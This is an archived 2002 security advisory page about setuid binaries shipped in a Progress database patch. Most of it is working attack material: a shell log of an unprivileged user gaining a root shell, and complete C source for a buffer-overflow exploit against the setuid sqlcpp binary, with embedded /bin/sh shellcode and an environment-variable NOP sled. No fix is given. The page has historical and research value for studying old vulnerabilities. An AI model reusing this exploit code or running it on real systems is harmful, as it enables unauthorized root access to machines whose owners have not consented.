Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: Apps N-Z :: lnx5228.htm

Progress database setuid binaries exploit



2nd Apr 2002 [SBWID-5228]
COMMAND

	Progress database setuid binaries exploit

SYSTEMS AFFECTED

	??

PROBLEM

	\'KF\' of Snosoft [http://www.snosoft.com] posted :
	

	Progress likes to include alot of suids in  their  patches...  and  they
	GIVE them to you even if you don\'t use the  software.  sqlcpp  was  NOT
	part of my install until I patched my box. Thanks for the root  security
	hole guys and STOP using p_stcopy()!
	

	[root@localhost root]# tar tzvf 91C09.tar.Z  | grep ws

	-rwsrwxr-x patchbld/rdl 1001997 2002-02-26 08:16:49 bin/_dbutil

	-rwsrwxr-x patchbld/rdl 1124797 2002-02-26 08:16:51 bin/_mprosrv

	-rwsrwxr-x patchbld/rdl 1540931 2002-02-26 08:16:52 bin/_mprshut

	-rwsrwxr-x patchbld/rdl  413694 2002-02-26 08:16:53 bin/_orasrv

	-rwsrwxr-x patchbld/rdl 4770560 2002-02-26 08:16:56 bin/_proapsv

	-rwsrwxr-x patchbld/rdl  268161 2002-02-26 08:16:57 bin/_probrkr

	-rwsrwxr-x patchbld/rdl 4260172 2002-02-26 08:17:00 bin/_probuild

	-rwsrwxr-x patchbld/rdl 4614600 2002-02-26 08:17:05 bin/_progres

	-rwsrwxr-x patchbld/rdl  311275 2002-02-26 08:17:06 bin/_prooibk

	-rwsrwxr-x patchbld/rdl 2220962 2002-02-26 08:17:08 bin/_prooidv

	-rwsrwxr-x patchbld/rdl 1692954 2002-02-26 08:17:10 bin/_proutil

	-rwsrwxr-x patchbld/rdl 1126861 2002-02-26 08:17:12 bin/_rfutil

	-rwsrwxr-x patchbld/rdl 4580488 2002-02-26 08:17:26 bin/orarx

	-rwsrwxr-x patchbld/rdl 2222278 2002-02-26 08:17:30 bin/sqlcpp

	

	Much thanks to \"The Itch\" and his great work.
	

	[dotslash@ghetto misc]$ id

	uid=501(dotslash) gid=501(dotslash) groups=501(dotslash)

	[dotslash@ghetto misc]$ cc -o sqlcppx sqlcppx.c

	[dotslash@ghetto misc]$ ./sqlcppx

	/usr/dlc/bin/sqlcpp

	Vulnerability found by KF / http://www.snosoft.com

	Coded by The Itch / http://www.promisc.org

	

	Using return address: 0xbffffae4

	Using buffersize    : 60

	sh-2.05# id

	uid=0(root) gid=501(dotslash) groups=501(dotslash)

	

	

	

	/*

	 * Yet another Progress Database exploit (version ??)

	 *

	 * The vulnerability was found by KF / Snosoft (http://www.snosoft.com)

	 * Exploit coded up by The Itch / Promisc (http://www.promisc.org)

	 *

	 * This exploit was developed on the Snosoft vulnerability research machines

	 * mail dotslash@snosoft.com if you are interested in contributing research time

	 *

	 * - The Itch

	 * - itchie@promisc.org

	 *

	 * - Technical details concerning the exploit -

	 *

	 * 1). Buffer overflow occurs after writing more then 56 bytes into the buffer at the command line

	 *     (56 to overwrite ebp, 60 to overwrite eip).

	 * 2). If you write more then 65 bytes, other frames will be overwritten afterwards and will mess up

	 *     your flow of arbitrary code execution.

	 */

	

	#include <stdio.h>

	#include <stdlib.h>

	

	#define DEFAULT_EGG_SIZE 2048

	#define NOP 0x90

	

	#define DEFAULT_BUFFER_SIZE 60

	

	char shellcode[] =

	        \"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\"

	        \"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\"

	        \"\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\"

	        \"\\x80\\xe8\\xdc\\xff\\xff\\xff/bin/sh\";

	

	int main(int argc, char *argv[])

	{

	        char *buff;

	        char *egg;

	        char *ptr;

	        long *addr_ptr;

	        long addr;

	        int bsize = DEFAULT_BUFFER_SIZE;

	        int eggsize = DEFAULT_EGG_SIZE;

	        int i;

	        int get_sp = (int)&get_sp;

	

	        if(argc > 1) { bsize = atoi(argv[1]); }

	

	        if(!(buff = malloc(bsize)))

	        {

	                printf(\"unable to allocate memory for %d bytes\\n\", bsize);

	                exit(1);

	        }

	

	        if(!(egg = malloc(eggsize)))

	        {

	                printf(\"unable to allocate memory for %d bytes\\n\", eggsize);

	                exit(1);

	        }

	

	        printf(\"/usr/dlc/bin/sqlcpp\\n\");

	        printf(\"Vulnerability found by KF / http://www.snosoft.com\\n\");

	        printf(\"Coded by The Itch / http://www.promisc.org\\n\\n\");

	        printf(\"Using return address: 0x%x\\n\", get_sp);

	        printf(\"Using buffersize    : %d\\n\", bsize);

	

	        ptr = buff;

	        addr_ptr = (long *) ptr;

	        for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; }

	

	        ptr = egg;

	        for(i = 0; i < eggsize - strlen(shellcode) -1; i++)

	        {

	                *(ptr++) = NOP;

	        }

	

	        for(i = 0; i < strlen(shellcode); i++)

	        {

	                *(ptr++) = shellcode[i];

	        }

	

	        egg[eggsize - 1] = \'\\0\';

	        memcpy(egg, \"EGG=\", 4);

	        putenv(egg);

	

	        execl(\"/usr/dlc/sqlcpp\", \"sqlcpp\", buff, 0);

	

	        return 0;

	}

	

SOLUTION

	None yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH